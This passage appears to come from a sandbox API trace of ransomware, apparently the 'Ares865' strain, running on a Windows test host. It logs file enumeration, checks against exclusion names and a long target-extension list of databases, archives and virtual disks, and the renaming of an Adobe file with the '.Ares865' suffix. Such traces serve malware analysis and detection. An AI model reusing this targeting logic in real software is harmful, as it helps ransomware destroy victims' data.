RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0106.375] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0106.375] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x336fc8 [0106.375] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2e0710 [0106.375] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fc8 | out: hHeap=0x2b0000) returned 1 [0106.375] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2e0828 [0106.375] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0106.375] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e0828 | out: hHeap=0x2b0000) returned 1 [0106.375] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0106.375] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e0710 | out: hHeap=0x2b0000) returned 1 [0106.375] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0106.375] CloseHandle (hObject=0x124) returned 1 [0106.375] CloseHandle (hObject=0x118) returned 1 [0106.376] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0106.376] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0106.376] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0106.376] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xecb5bdd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xecb5bdd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xd9c071a0, ftLastWriteTime.dwHighDateTime=0x1d2e625, nFileSizeHigh=0x0, nFileSizeLow=0x21cdb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AdobeSysFnt10.lst", cAlternateFileName="ADOBES~1.LST")) returned 1 [0106.376] lstrcmpiW (lpString1="AdobeSysFnt10.lst", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.376] lstrcmpiW (lpString1="AdobeSysFnt10.lst", lpString2="aoldtz.exe") returned -1 [0106.376] lstrcmpiW (lpString1="AdobeSysFnt10.lst", lpString2=".") returned 1 [0106.376] lstrcmpiW (lpString1="AdobeSysFnt10.lst", lpString2="..") returned 1 [0106.376] lstrcmpiW (lpString1="AdobeSysFnt10.lst", lpString2="windows") returned -1 [0106.376] lstrcmpiW (lpString1="AdobeSysFnt10.lst", lpString2="bootmgr") returned -1 [0106.376] lstrcmpiW (lpString1="AdobeSysFnt10.lst", lpString2="temp") returned -1 [0106.376] lstrcmpiW (lpString1="AdobeSysFnt10.lst", lpString2="pagefile.sys") returned -1 [0106.376] lstrcmpiW (lpString1="AdobeSysFnt10.lst", lpString2="boot") returned -1 [0106.376] lstrcmpiW (lpString1="AdobeSysFnt10.lst", lpString2="ids.txt") returned -1 [0106.376] lstrcmpiW (lpString1="AdobeSysFnt10.lst", lpString2="ntuser.dat") returned -1 [0106.376] lstrcmpiW (lpString1="AdobeSysFnt10.lst", lpString2="perflogs") returned -1 [0106.376] lstrcmpiW (lpString1="AdobeSysFnt10.lst", lpString2="MSBuild") returned -1 [0106.376] lstrlenW (lpString="AdobeSysFnt10.lst") returned 17 [0106.376] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst") returned 235 [0106.376] lstrcpyW (in: lpString1=0x2cce5b2, lpString2="AdobeSysFnt10.lst" | out: lpString1="AdobeSysFnt10.lst") returned="AdobeSysFnt10.lst" [0106.377] lstrlenW (lpString="AdobeSysFnt10.lst") returned 17 [0106.377] lstrlenW (lpString="Ares865") returned 7 [0106.377] lstrcmpiW (lpString1="t10.lst", lpString2="Ares865") returned 1 [0106.377] lstrlenW (lpString=".dll") returned 4 [0106.377] lstrcmpiW (lpString1="AdobeSysFnt10.lst", lpString2=".dll") returned 1 [0106.377] lstrlenW (lpString=".lnk") returned 4 [0106.377] lstrcmpiW (lpString1="AdobeSysFnt10.lst", lpString2=".lnk") returned 1 [0106.377] lstrlenW (lpString=".ini") returned 4 [0106.377] lstrcmpiW (lpString1="AdobeSysFnt10.lst", lpString2=".ini") returned 1 [0106.377] lstrlenW (lpString=".sys") returned 4 [0106.377] lstrcmpiW (lpString1="AdobeSysFnt10.lst", lpString2=".sys") returned 1 [0106.377] lstrlenW (lpString="AdobeSysFnt10.lst") returned 17 [0106.377] lstrlenW (lpString="bak") returned 3 [0106.377] lstrcmpiW (lpString1="lst", lpString2="bak") returned 1 [0106.377] lstrlenW (lpString="ba_") returned 3 [0106.377] lstrcmpiW (lpString1="lst", lpString2="ba_") returned 1 [0106.377] lstrlenW (lpString="dbb") returned 3 [0106.377] lstrcmpiW (lpString1="lst", lpString2="dbb") returned 1 [0106.377] lstrlenW (lpString="vmdk") returned 4 [0106.377] lstrcmpiW (lpString1=".lst", lpString2="vmdk") returned -1 [0106.377] lstrlenW (lpString="rar") returned 3 [0106.377] lstrcmpiW (lpString1="lst", lpString2="rar") returned -1 [0106.377] lstrlenW (lpString="zip") returned 3 [0106.377] lstrcmpiW (lpString1="lst", lpString2="zip") returned -1 [0106.377] lstrlenW (lpString="tgz") returned 3 [0106.377] lstrcmpiW (lpString1="lst", lpString2="tgz") returned -1 [0106.377] lstrlenW (lpString="vbox") returned 4 [0106.377] lstrcmpiW (lpString1=".lst", lpString2="vbox") returned -1 [0106.377] lstrlenW (lpString="vdi") returned 3 [0106.377] lstrcmpiW (lpString1="lst", lpString2="vdi") returned -1 [0106.377] lstrlenW (lpString="vhd") returned 3 [0106.377] lstrcmpiW (lpString1="lst", lpString2="vhd") returned -1 [0106.377] lstrlenW (lpString="vhdx") returned 4 [0106.377] lstrcmpiW (lpString1=".lst", lpString2="vhdx") returned -1 [0106.377] lstrlenW (lpString="avhd") returned 4 [0106.378] lstrcmpiW (lpString1=".lst", lpString2="avhd") returned -1 [0106.378] lstrlenW (lpString="db") returned 2 [0106.378] lstrcmpiW (lpString1="st", lpString2="db") returned 1 [0106.378] lstrlenW (lpString="db2") returned 3 [0106.378] lstrcmpiW (lpString1="lst", lpString2="db2") returned 1 [0106.378] lstrlenW (lpString="db3") returned 3 [0106.378] lstrcmpiW (lpString1="lst", lpString2="db3") returned 1 [0106.378] lstrlenW (lpString="dbf") returned 3 [0106.378] lstrcmpiW (lpString1="lst", lpString2="dbf") returned 1 [0106.378] lstrlenW (lpString="mdf") returned 3 [0106.378] lstrcmpiW (lpString1="lst", lpString2="mdf") returned -1 [0106.378] lstrlenW (lpString="mdb") returned 3 [0106.378] lstrcmpiW (lpString1="lst", lpString2="mdb") returned -1 [0106.378] lstrlenW (lpString="sql") returned 3 [0106.378] lstrcmpiW (lpString1="lst", lpString2="sql") returned -1 [0106.378] lstrlenW (lpString="sqlite") returned 6 [0106.378] lstrcmpiW (lpString1="10.lst", lpString2="sqlite") returned -1 [0106.378] lstrlenW (lpString="sqlite3") returned 7 [0106.378] lstrcmpiW (lpString1="t10.lst", lpString2="sqlite3") returned 1 [0106.378] lstrlenW (lpString="sqlitedb") returned 8 [0106.378] lstrcmpiW (lpString1="nt10.lst", lpString2="sqlitedb") returned -1 [0106.378] lstrlenW (lpString="xml") returned 3 [0106.378] lstrcmpiW (lpString1="lst", lpString2="xml") returned -1 [0106.378] lstrlenW (lpString="$er") returned 3 [0106.378] lstrcmpiW (lpString1="lst", lpString2="$er") returned 1 [0106.378] lstrlenW (lpString="4dd") returned 3 [0106.378] lstrcmpiW (lpString1="lst", lpString2="4dd") returned 1 [0106.378] lstrlenW (lpString="4dl") returned 3 [0106.378] lstrcmpiW (lpString1="lst", lpString2="4dl") returned 1 [0106.378] lstrlenW (lpString="^^^") returned 3 [0106.378] lstrcmpiW (lpString1="lst", lpString2="^^^") returned 1 [0106.378] lstrlenW (lpString="abs") returned 3 [0106.378] lstrcmpiW (lpString1="lst", lpString2="abs") returned 1 [0106.378] lstrlenW (lpString="abx") returned 3 [0106.378] lstrcmpiW (lpString1="lst", lpString2="abx") returned 1 [0106.379] lstrlenW (lpString="accdb") returned 5 [0106.379] lstrcmpiW (lpString1="0.lst", lpString2="accdb") returned -1 [0106.379] lstrlenW (lpString="accdc") returned 5 [0106.379] lstrcmpiW (lpString1="0.lst", lpString2="accdc") returned -1 [0106.379] lstrlenW (lpString="accde") returned 5 [0106.379] lstrcmpiW (lpString1="0.lst", lpString2="accde") returned -1 [0106.379] lstrlenW (lpString="accdr") returned 5 [0106.379] lstrcmpiW (lpString1="0.lst", lpString2="accdr") returned -1 [0106.379] lstrlenW (lpString="accdt") returned 5 [0106.379] lstrcmpiW (lpString1="0.lst", lpString2="accdt") returned -1 [0106.379] lstrlenW (lpString="accdw") returned 5 [0106.379] lstrcmpiW (lpString1="0.lst", lpString2="accdw") returned -1 [0106.379] lstrlenW (lpString="accft") returned 5 [0106.379] lstrcmpiW (lpString1="0.lst", lpString2="accft") returned -1 [0106.379] lstrlenW (lpString="adb") returned 3 [0106.379] lstrcmpiW (lpString1="lst", lpString2="adb") returned 1 [0106.379] lstrlenW (lpString="adb") returned 3 [0106.379] lstrcmpiW (lpString1="lst", lpString2="adb") returned 1 [0106.379] lstrlenW (lpString="ade") returned 3 [0106.379] lstrcmpiW (lpString1="lst", lpString2="ade") returned 1 [0106.379] lstrlenW (lpString="adf") returned 3 [0106.379] lstrcmpiW (lpString1="lst", lpString2="adf") returned 1 [0106.379] lstrlenW (lpString="adn") returned 3 [0106.379] lstrcmpiW (lpString1="lst", lpString2="adn") returned 1 [0106.379] lstrlenW (lpString="adp") returned 3 [0106.379] lstrcmpiW (lpString1="lst", lpString2="adp") returned 1 [0106.379] lstrlenW (lpString="alf") returned 3 [0106.379] lstrcmpiW (lpString1="lst", lpString2="alf") returned 1 [0106.379] lstrlenW (lpString="ask") returned 3 [0106.379] lstrcmpiW (lpString1="lst", lpString2="ask") returned 1 [0106.379] lstrlenW (lpString="btr") returned 3 [0106.379] lstrcmpiW (lpString1="lst", lpString2="btr") returned 1 [0106.379] lstrlenW (lpString="cat") returned 3 [0106.379] lstrcmpiW (lpString1="lst", lpString2="cat") returned 1 [0106.379] lstrlenW (lpString="cdb") returned 3 [0106.380] lstrcmpiW (lpString1="lst", lpString2="cdb") returned 1 [0106.380] lstrlenW (lpString="ckp") returned 3 [0106.380] lstrcmpiW (lpString1="lst", lpString2="ckp") returned 1 [0106.380] lstrlenW (lpString="cma") returned 3 [0106.380] lstrcmpiW (lpString1="lst", lpString2="cma") returned 1 [0106.380] lstrlenW (lpString="cpd") returned 3 [0106.380] lstrcmpiW (lpString1="lst", lpString2="cpd") returned 1 [0106.380] lstrlenW (lpString="dacpac") returned 6 [0106.380] lstrcmpiW (lpString1="10.lst", lpString2="dacpac") returned -1 [0106.380] lstrlenW (lpString="dad") returned 3 [0106.380] lstrcmpiW (lpString1="lst", lpString2="dad") returned 1 [0106.380] lstrlenW (lpString="dadiagrams") returned 10 [0106.380] lstrcmpiW (lpString1="sFnt10.lst", lpString2="dadiagrams") returned 1 [0106.380] lstrlenW (lpString="daschema") returned 8 [0106.380] lstrcmpiW (lpString1="nt10.lst", lpString2="daschema") returned 1 [0106.380] lstrlenW (lpString="db-journal") returned 10 [0106.380] lstrcmpiW (lpString1="sFnt10.lst", lpString2="db-journal") returned 1 [0106.380] lstrlenW (lpString="db-shm") returned 6 [0106.380] lstrcmpiW (lpString1="10.lst", lpString2="db-shm") returned -1 [0106.380] lstrlenW (lpString="db-wal") returned 6 [0106.380] lstrcmpiW (lpString1="10.lst", lpString2="db-wal") returned -1 [0106.380] lstrlenW (lpString="dbc") returned 3 [0106.380] lstrcmpiW (lpString1="lst", lpString2="dbc") returned 1 [0106.380] lstrlenW (lpString="dbs") returned 3 [0106.380] lstrcmpiW (lpString1="lst", lpString2="dbs") returned 1 [0106.380] lstrlenW (lpString="dbt") returned 3 [0106.380] lstrcmpiW (lpString1="lst", lpString2="dbt") returned 1 [0106.380] lstrlenW (lpString="dbv") returned 3 [0106.380] lstrcmpiW (lpString1="lst", lpString2="dbv") returned 1 [0106.380] lstrlenW (lpString="dbx") returned 3 [0106.380] lstrcmpiW (lpString1="lst", lpString2="dbx") returned 1 [0106.380] lstrlenW (lpString="dcb") returned 3 [0106.380] lstrcmpiW (lpString1="lst", lpString2="dcb") returned 1 [0106.380] lstrlenW (lpString="dct") returned 3 [0106.380] lstrcmpiW (lpString1="lst", lpString2="dct") returned 1 [0106.381] lstrlenW (lpString="dcx") returned 3 [0106.381] lstrcmpiW (lpString1="lst", lpString2="dcx") returned 1 [0106.381] lstrlenW (lpString="ddl") returned 3 [0106.381] lstrcmpiW (lpString1="lst", lpString2="ddl") returned 1 [0106.381] lstrlenW (lpString="dlis") returned 4 [0106.381] lstrcmpiW (lpString1=".lst", lpString2="dlis") returned -1 [0106.381] lstrlenW (lpString="dp1") returned 3 [0106.381] lstrcmpiW (lpString1="lst", lpString2="dp1") returned 1 [0106.381] lstrlenW (lpString="dqy") returned 3 [0106.381] lstrcmpiW (lpString1="lst", lpString2="dqy") returned 1 [0106.381] lstrlenW (lpString="dsk") returned 3 [0106.381] lstrcmpiW (lpString1="lst", lpString2="dsk") returned 1 [0106.381] lstrlenW (lpString="dsn") returned 3 [0106.381] lstrcmpiW (lpString1="lst", lpString2="dsn") returned 1 [0106.381] lstrlenW (lpString="dtsx") returned 4 [0106.381] lstrcmpiW (lpString1=".lst", lpString2="dtsx") returned -1 [0106.381] lstrlenW (lpString="dxl") returned 3 [0106.381] lstrcmpiW (lpString1="lst", lpString2="dxl") returned 1 [0106.381] lstrlenW (lpString="eco") returned 3 [0106.381] lstrcmpiW (lpString1="lst", lpString2="eco") returned 1 [0106.381] lstrlenW (lpString="ecx") returned 3 [0106.381] lstrcmpiW (lpString1="lst", lpString2="ecx") returned 1 [0106.381] lstrlenW (lpString="edb") returned 3 [0106.381] lstrcmpiW (lpString1="lst", lpString2="edb") returned 1 [0106.381] lstrlenW (lpString="epim") returned 4 [0106.381] lstrcmpiW (lpString1=".lst", lpString2="epim") returned -1 [0106.381] lstrlenW (lpString="fcd") returned 3 [0106.381] lstrcmpiW (lpString1="lst", lpString2="fcd") returned 1 [0106.381] lstrlenW (lpString="fdb") returned 3 [0106.381] lstrcmpiW (lpString1="lst", lpString2="fdb") returned 1 [0106.381] lstrlenW (lpString="fic") returned 3 [0106.381] lstrcmpiW (lpString1="lst", lpString2="fic") returned 1 [0106.381] lstrlenW (lpString="flexolibrary") returned 12 [0106.381] lstrcmpiW (lpString1="SysFnt10.lst", lpString2="flexolibrary") returned 1 [0106.381] lstrlenW (lpString="fm5") returned 3 [0106.381] lstrcmpiW (lpString1="lst", lpString2="fm5") returned 1 [0106.382] lstrlenW (lpString="fmp") returned 3 [0106.382] lstrcmpiW (lpString1="lst", lpString2="fmp") returned 1 [0106.382] lstrlenW (lpString="fmp12") returned 5 [0106.382] lstrcmpiW (lpString1="0.lst", lpString2="fmp12") returned -1 [0106.382] lstrlenW (lpString="fmpsl") returned 5 [0106.382] lstrcmpiW (lpString1="0.lst", lpString2="fmpsl") returned -1 [0106.382] lstrlenW (lpString="fol") returned 3 [0106.382] lstrcmpiW (lpString1="lst", lpString2="fol") returned 1 [0106.382] lstrlenW (lpString="fp3") returned 3 [0106.382] lstrcmpiW (lpString1="lst", lpString2="fp3") returned 1 [0106.382] lstrlenW (lpString="fp4") returned 3 [0106.382] lstrcmpiW (lpString1="lst", lpString2="fp4") returned 1 [0106.382] lstrlenW (lpString="fp5") returned 3 [0106.382] lstrcmpiW (lpString1="lst", lpString2="fp5") returned 1 [0106.382] lstrlenW (lpString="fp7") returned 3 [0106.382] lstrcmpiW (lpString1="lst", lpString2="fp7") returned 1 [0106.382] lstrlenW (lpString="fpt") returned 3 [0106.382] lstrcmpiW (lpString1="lst", lpString2="fpt") returned 1 [0106.382] lstrlenW (lpString="frm") returned 3 [0106.382] lstrcmpiW (lpString1="lst", lpString2="frm") returned 1 [0106.382] lstrlenW (lpString="gdb") returned 3 [0106.382] lstrcmpiW (lpString1="lst", lpString2="gdb") returned 1 [0106.382] lstrlenW (lpString="gdb") returned 3 [0106.382] lstrcmpiW (lpString1="lst", lpString2="gdb") returned 1 [0106.382] lstrlenW (lpString="grdb") returned 4 [0106.382] lstrcmpiW (lpString1=".lst", lpString2="grdb") returned -1 [0106.382] lstrlenW (lpString="gwi") returned 3 [0106.382] lstrcmpiW (lpString1="lst", lpString2="gwi") returned 1 [0106.382] lstrlenW (lpString="hdb") returned 3 [0106.382] lstrcmpiW (lpString1="lst", lpString2="hdb") returned 1 [0106.382] lstrlenW (lpString="his") returned 3 [0106.382] lstrcmpiW (lpString1="lst", lpString2="his") returned 1 [0106.382] lstrlenW (lpString="ib") returned 2 [0106.382] lstrcmpiW (lpString1="st", lpString2="ib") returned 1 [0106.382] lstrlenW (lpString="idb") returned 3 [0106.383] lstrcmpiW (lpString1="lst", lpString2="idb") returned 1 [0106.383] lstrlenW (lpString="ihx") returned 3 [0106.383] lstrcmpiW (lpString1="lst", lpString2="ihx") returned 1 [0106.383] lstrlenW (lpString="itdb") returned 4 [0106.383] lstrcmpiW (lpString1=".lst", lpString2="itdb") returned -1 [0106.383] lstrlenW (lpString="itw") returned 3 [0106.383] lstrcmpiW (lpString1="lst", lpString2="itw") returned 1 [0106.383] lstrlenW (lpString="jet") returned 3 [0106.383] lstrcmpiW (lpString1="lst", lpString2="jet") returned 1 [0106.383] lstrlenW (lpString="jtx") returned 3 [0106.383] lstrcmpiW (lpString1="lst", lpString2="jtx") returned 1 [0106.383] lstrlenW (lpString="kdb") returned 3 [0106.383] lstrcmpiW (lpString1="lst", lpString2="kdb") returned 1 [0106.383] lstrlenW (lpString="kexi") returned 4 [0106.383] lstrcmpiW (lpString1=".lst", lpString2="kexi") returned -1 [0106.383] lstrlenW (lpString="kexic") returned 5 [0106.383] lstrcmpiW (lpString1="0.lst", lpString2="kexic") returned -1 [0106.383] lstrlenW (lpString="kexis") returned 5 [0106.383] lstrcmpiW (lpString1="0.lst", lpString2="kexis") returned -1 [0106.383] lstrlenW (lpString="lgc") returned 3 [0106.383] lstrcmpiW (lpString1="lst", lpString2="lgc") returned 1 [0106.383] lstrlenW (lpString="lwx") returned 3 [0106.383] lstrcmpiW (lpString1="lst", lpString2="lwx") returned -1 [0106.383] lstrlenW (lpString="maf") returned 3 [0106.383] lstrcmpiW (lpString1="lst", lpString2="maf") returned -1 [0106.383] lstrlenW (lpString="maq") returned 3 [0106.383] lstrcmpiW (lpString1="lst", lpString2="maq") returned -1 [0106.383] lstrlenW (lpString="mar") returned 3 [0106.383] lstrcmpiW (lpString1="lst", lpString2="mar") returned -1 [0106.383] lstrlenW (lpString="marshal") returned 7 [0106.383] lstrcmpiW (lpString1="t10.lst", lpString2="marshal") returned 1 [0106.383] lstrlenW (lpString="mas") returned 3 [0106.383] lstrcmpiW (lpString1="lst", lpString2="mas") returned -1 [0106.383] lstrlenW (lpString="mav") returned 3 [0106.383] lstrcmpiW (lpString1="lst", lpString2="mav") returned -1 [0106.383] lstrlenW (lpString="maw") returned 3 [0106.384] lstrcmpiW (lpString1="lst", lpString2="maw") returned -1 [0106.384] lstrlenW (lpString="mdbhtml") returned 7 [0106.384] lstrcmpiW (lpString1="t10.lst", lpString2="mdbhtml") returned 1 [0106.384] lstrlenW (lpString="mdn") returned 3 [0106.384] lstrcmpiW (lpString1="lst", lpString2="mdn") returned -1 [0106.384] lstrlenW (lpString="mdt") returned 3 [0106.384] lstrcmpiW (lpString1="lst", lpString2="mdt") returned -1 [0106.384] lstrlenW (lpString="mfd") returned 3 [0106.384] lstrcmpiW (lpString1="lst", lpString2="mfd") returned -1 [0106.384] lstrlenW (lpString="mpd") returned 3 [0106.384] lstrcmpiW (lpString1="lst", lpString2="mpd") returned -1 [0106.384] lstrlenW (lpString="mrg") returned 3 [0106.384] lstrcmpiW (lpString1="lst", lpString2="mrg") returned -1 [0106.384] lstrlenW (lpString="mud") returned 3 [0106.384] lstrcmpiW (lpString1="lst", lpString2="mud") returned -1 [0106.384] lstrlenW (lpString="mwb") returned 3 [0106.384] lstrcmpiW (lpString1="lst", lpString2="mwb") returned -1 [0106.384] lstrlenW (lpString="myd") returned 3 [0106.384] lstrcmpiW (lpString1="lst", lpString2="myd") returned -1 [0106.384] lstrlenW (lpString="ndf") returned 3 [0106.384] lstrcmpiW (lpString1="lst", lpString2="ndf") returned -1 [0106.384] lstrlenW (lpString="nnt") returned 3 [0106.384] lstrcmpiW (lpString1="lst", lpString2="nnt") returned -1 [0106.384] lstrlenW (lpString="nrmlib") returned 6 [0106.384] lstrcmpiW (lpString1="10.lst", lpString2="nrmlib") returned -1 [0106.384] lstrlenW (lpString="ns2") returned 3 [0106.384] lstrcmpiW (lpString1="lst", lpString2="ns2") returned -1 [0106.384] lstrlenW (lpString="ns3") returned 3 [0106.384] lstrcmpiW (lpString1="lst", lpString2="ns3") returned -1 [0106.384] lstrlenW (lpString="ns4") returned 3 [0106.384] lstrcmpiW (lpString1="lst", lpString2="ns4") returned -1 [0106.384] lstrlenW (lpString="nsf") returned 3 [0106.384] lstrcmpiW (lpString1="lst", lpString2="nsf") returned -1 [0106.384] lstrlenW (lpString="nv") returned 2 [0106.384] lstrcmpiW (lpString1="st", lpString2="nv") returned 1 [0106.385] lstrlenW (lpString="nv2") returned 3 [0106.385] lstrcmpiW (lpString1="lst", lpString2="nv2") returned -1 [0106.385] lstrlenW (lpString="nwdb") returned 4 [0106.385] lstrcmpiW (lpString1=".lst", lpString2="nwdb") returned -1 [0106.385] lstrlenW (lpString="nyf") returned 3 [0106.385] lstrcmpiW (lpString1="lst", lpString2="nyf") returned -1 [0106.385] lstrlenW (lpString="odb") returned 3 [0106.385] lstrcmpiW (lpString1="lst", lpString2="odb") returned -1 [0106.385] lstrlenW (lpString="odb") returned 3 [0106.385] lstrcmpiW (lpString1="lst", lpString2="odb") returned -1 [0106.385] lstrlenW (lpString="oqy") returned 3 [0106.385] lstrcmpiW (lpString1="lst", lpString2="oqy") returned -1 [0106.385] lstrlenW (lpString="ora") returned 3 [0106.385] lstrcmpiW (lpString1="lst", lpString2="ora") returned -1 [0106.385] lstrlenW (lpString="orx") returned 3 [0106.385] lstrcmpiW (lpString1="lst", lpString2="orx") returned -1 [0106.385] lstrlenW (lpString="owc") returned 3 [0106.385] lstrcmpiW (lpString1="lst", lpString2="owc") returned -1 [0106.385] lstrlenW (lpString="p96") returned 3 [0106.385] lstrcmpiW (lpString1="lst", lpString2="p96") returned -1 [0106.385] lstrlenW (lpString="p97") returned 3 [0106.385] lstrcmpiW (lpString1="lst", lpString2="p97") returned -1 [0106.385] lstrlenW (lpString="pan") returned 3 [0106.385] lstrcmpiW (lpString1="lst", lpString2="pan") returned -1 [0106.385] lstrlenW (lpString="pdb") returned 3 [0106.385] lstrcmpiW (lpString1="lst", lpString2="pdb") returned -1 [0106.385] lstrlenW (lpString="pdm") returned 3 [0106.385] lstrcmpiW (lpString1="lst", lpString2="pdm") returned -1 [0106.385] lstrlenW (lpString="pnz") returned 3 [0106.385] lstrcmpiW (lpString1="lst", lpString2="pnz") returned -1 [0106.385] lstrlenW (lpString="qry") returned 3 [0106.385] lstrcmpiW (lpString1="lst", lpString2="qry") returned -1 [0106.385] lstrlenW (lpString="qvd") returned 3 [0106.385] lstrcmpiW (lpString1="lst", lpString2="qvd") returned -1 [0106.385] lstrlenW (lpString="rbf") returned 3 [0106.386] lstrcmpiW (lpString1="lst", lpString2="rbf") returned -1 [0106.386] lstrlenW (lpString="rctd") returned 4 [0106.386] lstrcmpiW (lpString1=".lst", lpString2="rctd") returned -1 [0106.386] lstrlenW (lpString="rod") returned 3 [0106.386] lstrcmpiW (lpString1="lst", lpString2="rod") returned -1 [0106.386] lstrlenW (lpString="rodx") returned 4 [0106.386] lstrcmpiW (lpString1=".lst", lpString2="rodx") returned -1 [0106.386] lstrlenW (lpString="rpd") returned 3 [0106.386] lstrcmpiW (lpString1="lst", lpString2="rpd") returned -1 [0106.386] lstrlenW (lpString="rsd") returned 3 [0106.386] lstrcmpiW (lpString1="lst", lpString2="rsd") returned -1 [0106.386] lstrlenW (lpString="sas7bdat") returned 8 [0106.386] lstrcmpiW (lpString1="nt10.lst", lpString2="sas7bdat") returned -1 [0106.386] lstrlenW (lpString="sbf") returned 3 [0106.386] lstrcmpiW (lpString1="lst", lpString2="sbf") returned -1 [0106.386] lstrlenW (lpString="scx") returned 3 [0106.386] lstrcmpiW (lpString1="lst", lpString2="scx") returned -1 [0106.386] lstrlenW (lpString="sdb") returned 3 [0106.386] lstrcmpiW (lpString1="lst", lpString2="sdb") returned -1 [0106.386] lstrlenW (lpString="sdc") returned 3 [0106.386] lstrcmpiW (lpString1="lst", lpString2="sdc") returned -1 [0106.386] lstrlenW (lpString="sdf") returned 3 [0106.386] lstrcmpiW (lpString1="lst", lpString2="sdf") returned -1 [0106.386] lstrlenW (lpString="sis") returned 3 [0106.386] lstrcmpiW (lpString1="lst", lpString2="sis") returned -1 [0106.386] lstrlenW (lpString="spq") returned 3 [0106.386] lstrcmpiW (lpString1="lst", lpString2="spq") returned -1 [0106.386] lstrlenW (lpString="te") returned 2 [0106.386] lstrcmpiW (lpString1="st", lpString2="te") returned -1 [0106.387] lstrlenW (lpString="teacher") returned 7 [0106.387] lstrcmpiW (lpString1="t10.lst", lpString2="teacher") returned -1 [0106.387] lstrlenW (lpString="tmd") returned 3 [0106.387] lstrcmpiW (lpString1="lst", lpString2="tmd") returned -1 [0106.387] lstrlenW (lpString="tps") returned 3 [0106.387] lstrcmpiW (lpString1="lst", lpString2="tps") returned -1 [0106.387] lstrlenW (lpString="trc") returned 3 [0106.387] lstrcmpiW (lpString1="lst", lpString2="trc") returned -1 [0106.387] lstrlenW (lpString="trc") returned 3 [0106.387] lstrcmpiW (lpString1="lst", lpString2="trc") returned -1 [0106.387] lstrlenW (lpString="trm") returned 3 [0106.387] lstrcmpiW (lpString1="lst", lpString2="trm") returned -1 [0106.387] lstrlenW (lpString="udb") returned 3 [0106.387] lstrcmpiW (lpString1="lst", lpString2="udb") returned -1 [0106.387] lstrlenW (lpString="udl") returned 3 [0106.387] lstrcmpiW (lpString1="lst", lpString2="udl") returned -1 [0106.387] lstrlenW (lpString="usr") returned 3 [0106.387] lstrcmpiW (lpString1="lst", lpString2="usr") returned -1 [0106.387] lstrlenW (lpString="v12") returned 3 [0106.387] lstrcmpiW (lpString1="lst", lpString2="v12") returned -1 [0106.387] lstrlenW (lpString="vis") returned 3 [0106.387] lstrcmpiW (lpString1="lst", lpString2="vis") returned -1 [0106.387] lstrlenW (lpString="vpd") returned 3 [0106.387] lstrcmpiW (lpString1="lst", lpString2="vpd") returned -1 [0106.387] lstrlenW (lpString="vvv") returned 3 [0106.387] lstrcmpiW (lpString1="lst", lpString2="vvv") returned -1 [0106.387] lstrlenW (lpString="wdb") returned 3 [0106.387] lstrcmpiW (lpString1="lst", lpString2="wdb") returned -1 [0106.387] lstrlenW (lpString="wmdb") returned 4 [0106.387] lstrcmpiW (lpString1=".lst", lpString2="wmdb") returned -1 [0106.387] lstrlenW (lpString="wrk") returned 3 [0106.387] lstrcmpiW (lpString1="lst", lpString2="wrk") returned -1 [0106.387] lstrlenW (lpString="xdb") returned 3 [0106.387] lstrcmpiW (lpString1="lst", lpString2="xdb") returned -1 [0106.388] lstrlenW (lpString="xld") returned 3 [0106.388] lstrcmpiW (lpString1="lst", lpString2="xld") returned -1 [0106.388] lstrlenW (lpString="xmlff") returned 5 [0106.388] lstrcmpiW (lpString1="0.lst", lpString2="xmlff") returned -1 [0106.388] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst.Ares865") returned 242 [0106.388] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\adobesysfnt10.lst"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application 